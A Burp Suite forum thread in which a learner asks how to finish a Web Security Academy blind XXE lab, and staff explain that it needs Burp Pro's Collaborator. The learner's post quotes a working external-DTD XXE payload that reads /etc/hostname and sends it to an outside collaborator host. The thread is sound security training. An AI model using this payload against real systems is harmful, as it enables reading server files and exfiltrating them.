Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Web Security Academy - Blind XXE Lab 3 ("Exploiting blind XXE to exfiltrate data using a malicious")

Michael | Last updated: Jun 03, 2019 09:19PM UTC

Dear Support, I tried the challenge to receive the /etc/hostname using the following: Initial XML in HTTP request: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://ac83206f38f287db80cfc1db01360044.web-security-academy.net/exploit"> %xxe; ]> <stockCheck> <productId>6</productId> <storeId>1</storeId> </stockCheck> This should fetch me the further xml lines that should be performed. Surfing the link shows the following code as-is: <!ENTITY % targetfile SYSTEM "file:///etc/hostname"> <!ENTITY % evaluation "<!ENTITY data SYSTEM 'http://burpcollaborator.net/?x=%targetfile;'>"> %evaluation; &data; From my understanding, what I'm missing here is the burpcollaborator-host that should receive the file I'm sending here. For this, the Burp Collaborator Client should be used according to the "solution" - which is a Burp Suite pro feature. As I did not find any button to access this 'client' otherwise and the web security academy is supposed to be free, I'd like to know what I'm missing here. Thanks in advance and kind regards, Michael

PortSwigger Agent | Last updated: Jun 04, 2019 09:12AM UTC

Hi Michael, Thanks for your message, and good to see you progressing on the Web Security Academy. The Collaborator client is only available in Burp Pro, so unfortunately you can't currently solve that level using Burp Community Edition. We are going to look at options to resolve this in future. In the meantime, there are plenty of labs that you can solve with Burp Community Edition. Please let us know if you need any further assistance.

Burp User | Last updated: Jun 04, 2019 01:41PM UTC

Hi, Thanks for your reply - so I did not just miss it ;-) Will go on for other labs, keep up the good work! Thanks and kind regards, Michael

Burp User | Last updated: Nov 07, 2019 07:11PM UTC

Why not just receive it using the same web security academy exploit address? It logs every request that comes, so you can give it an invalid url and see the result in the log.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.